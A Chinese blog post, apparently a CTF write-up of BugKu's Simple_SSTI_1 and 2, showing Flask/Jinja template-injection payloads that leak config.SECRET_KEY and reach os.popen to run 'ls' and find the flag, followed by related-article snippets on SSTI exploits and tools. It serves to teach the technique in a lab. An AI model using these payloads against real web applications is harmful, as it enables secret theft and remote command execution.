Simple_SSTI_1和2(SSTI模板注入)

最新推荐文章于 2024-05-29 17:01:36 发布
最新推荐文章于 2024-05-29 17:01:36 发布
阅读量73 收藏
点赞数
文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yushuai66/article/details/131334478
版权

首先我们进入页面,会得到一段文字,其让我们找到flag参数。

 

接下来,就可以按f12,去检查它的页面,从而得到这么一段提示。 

 根据提示信息,我们利用flask的模板注入/?flag={{config.SECRET_KEY}},就能直接得到flag。

Simple_SSTI_2

 

 

一进来,发现和1一样,就先试试f12检查页面试试。

 这时,发现没有什么提示信息,就只能试{{config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}从而读取网站系统目录,发现存在一些文件夹,然后猜测有没有flag文件,就试试挨着找找看。

  通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}读取读取app目录下的文件,一下子就发现存在flag文件。

 最后再补上{{ config.__class__.__init__.__globals__['os'].popen('ls ../app/flag').read() }}flag的路径,就可以读取flag文件了。

 

##__class__:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。

##__init__             初始化类,返回的类型是function

##__globals__[]          使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。

##os.popen() 方法用于从一个命令打开一个管道。

##open() 方法用于打开一个文件,并返回文件对象
 

yushuai66
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
顾名思义,服务器端模板注入有效负载是在服务器端交付和评估的,这可能使它们比典型的客户端模板注入更加危险。 影响 : 服务器端模板注入漏洞可能使网站遭受各种攻击,具体取决于所讨论的模板引擎以及应用程序...
gentlexue#POC-3#Apache OfBiz 服务器端模板注入SSTI)1
07-25
Apache OfBiz 服务器端模板注入SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI)的影响,从而导致远程代码执行
Simple_SSTI_2
天天学安全专属博客
03-03 922
Simple_SSTI_2,backup靶场
WEB Simple_SSTI_2
m0_57954651的博客
05-02 435
打开题目 似乎和第一题有相同之处 先来测试一下有没有类似注入的漏洞 回显正常 说明方向没错 再此构造 ?flag={{''.__class__.__mro__}}(借鉴大佬..) 用mro回显到了两类 str object 我们可利用第二的object来作突破 THEN 利用subclasses这个参数 __subclasses__属性会输出该类下所有的子类 ?flag={{''.__class__.__mro__[1].__subclasses__() }} 看到了里面的...
SSTI-2 继承关系 & 魔术方法
ZQING
08-20 107
由于在模板注入时,我们能够注入的地方,终究只是一个变量,而不是 Python 语句。所以直接注入 Python 语句是不能执行的,需要一些特殊操作让变量类型转换为函数或方法。这个转换过程,就涉及到了 Python 中类的继承关系以及魔术方法的使用。在这之前,我们应该先理解面向对象技术。
Bugku:Simple_SSTI_2(小宇特详解)
小宇的web博客
06-17 2338
Bugku:Simple_SSTI_2(小宇特详解) 1.这里还是提示模板注入。这里ls查看存在的文件 /?flag={{ config.class.init.globals[‘os’].popen(‘ls …/’).read() }} 2.这里先查看app文件 ?flag={{ config.class.init.globals[‘os’].popen(‘ls …/app/’).read() }} 3.这里由于没有过滤可以直接访问 ?flag={{ config.class.init.globals[
BugKu-Web-Simple_SSTI_1&Simple_SSTI_2(浅析SSTI模板注入!)
m0_73734159的博客
12-13 1090
服务端接收了用户的恶意输入以后,未经任何处理就将其作为Web应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell等问题。{{}}是模板变量的用法。在模板中,想要展示视图向模板渲染的变量,需要使用{{变量}}进行接收。这些文件包含了程序运行所需的设置和参数,使得程序可以根据配置文件的内容进行适应性调整。唉,我不免耸了耸肩,有些无奈,并未发现什么有用的。对于这段命令,在第一题,我也是有所提及,相差不大。
Simple_SSTI_1与Simple_SSTI_2
heyingcheng的博客
10-17 2983
#__globals__[] 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。flask是一个使用Python编写的轻量级Web应用框架(一种开发框架,用来支持动态网站,网络应用程序及网络服务的开发。3,SECRET_KEY配置变量是通用密钥,可在Flask和多个第三方扩展中使用,加密的强度取决于变量值的机密度,不同的程序使用不同的密钥。于是猜测flag是否藏在某一个文件夹中,于是尝试用ls列举出文件夹中的文件一下。
BugKu:Simple_SSTISSTI模板注入
热门推荐
m0_54082441的博客
05-01 1万+
1.签到题 这个题相当easy了,只要按照描述来做,便能得到flag,答案如下: flag{BugKu-Sec-pwn!} 2.Simple_SSTI_1(SSTI模板注入) 点击链接进入,题目说: You need pass in a parameter named flag。(你需要传入一个名为flag的参数)然后我们可以直接f12查看,也可以右击页面--->“检查” 如图所示,我们会得到相关的提示,根据提示信息,我们利用flask模板注入,就能直接得到flag。
Bugku Simple_SSTI_2
qq_52718293的博客
10-23 2462
首先打开之后是上面这样,题目有提示是ssti,所以
Bugku [Simple_SSTI_2](基于ctf题目学习SSTI服务器模板注入
MAHRE_Z的博客
11-09 503
打开网址发现一串英文,提示“You need pass in a parameter named flag”(“您需要传入一个名为 flag 的参数”),根据题目提示SSTI,搜索一下SSTI,发现一篇文章介绍。显示为flag参数的值,可以知道页面会显示被传入flag参数的值,然后进行报错看一看网站使用的模板类型。不错,其中有讲到什么是注入,说是格式化字符串漏洞的一种体现,然后我就又找了一篇关于。发现目录,进入app目录,发现flag文件。用cat命令查看flag,得到flag。
BUGKU-WEB Simple_SSTI_1
天泽岁月
02-04 2108
BUGKU 第02题
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 安全人才 威胁情报 安全建设 安全开发 解决方案
tplmap:服务器端模板注入和代码注入检测与开发工具
05-03
Tplmap通过许多沙箱转义技术来帮助利用代码注入和服务器端模板注入漏洞来访问底层操作系统。 开发该工具及其测试套件是为了研究SSTI漏洞类别,并在Web应用程序渗透测试期间用作攻击性安全工具。 沙盒突破技术来自...
Flask教程5:flask数据库SQLAlchemy
Cachel Wood的博客
05-27 369
它的核心思想于在于将关系数据库表中的记录映射成为对象,以对象的形式展现,程序员可以把对数据库的操作转化为对对象的操作。,我们可能会写特别多的数据访问层的代码,从数据库保存、删除、读取对象信息,但这些代码都是重复的。当需要实现一个应用程序时,如果不使用。则能够大大减少重复性的代码。
Python flask怎么连接MySQL?
最新发布
琳琳的博客
05-29 416
使用Django ORM时,你需要遵循Django的项目和应用结构,并在应用的`models.py`文件中定义模型。在Python中连接MySQL并使用模型创建新的表,通常我们会使用ORM(对象关系映射)库,比如SQLAlchemy或者Django ORM,它们允许我们定义Python类来映射到数据库中的表,并通过这些类进行数据库操作。请确保将`username`、`password`、`localhost`、`3306`和`dbname`替换为你自己的MySQL数据库的实际凭证和设置。
基于python flask的疾病数据采集与可视化大屏,实现关联规则算法的治疗方法分析
weixin_49081159的博客
05-28 613
基于Python Flask的疾病数据采集与可视化大屏,旨在实现对疾病数据的采集、分析和可视化展示,为医疗领域提供决策支持和治疗方法分析。其中,关联规则算法被应用于治疗方法分析,旨在发现不同治疗方式之间的关联性和规律性,从而为医疗决策提供依据。通过大屏可视化展示,医疗从业者可以直观了解不同治疗方法之间的相关性,探索潜在的治疗方案组合,优化治疗流程,提高医疗效率和疗效。这项研究背景旨在结合数据采集、关联规则算法和可视化技术,为医疗决策提供更科学、数据驱动的支持,推动医疗信息化与智能化发展。
基于python flask +pyecharts实现的气象数据可视化分析大屏
weixin_49081159的博客
05-28 504
气象数据可视化分析大屏基于Python Flask和Pyecharts技术,旨在通过图表展示气象数据的分析结果,提供直观的数据展示和分析功能。在当今信息化时代,气象数据的准确性和实时性对各行业具有重要意义。通过搭建气象数据可视化分析大屏,用户可以实时监测和分析气象数据趋势,帮助决策者制定有效的应对措施。该系统将为气象领域的研究人员、气象服务机构和相关行业提供强大的数据分析和决策支持,推动气象信息化应用的发展和提升。
bugkuctfweb题解simple_ssti_1
06-28
simple_ssti_1 是一个使用 Flask 框架编写的 web CTF 题目,主要涉及到服务器端模板注入 (Server-Side Template Injection, SSTI) 的问题。 这个题目中,使用者可以在输入框中输入任意字符串,然后后端会将这个字符...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值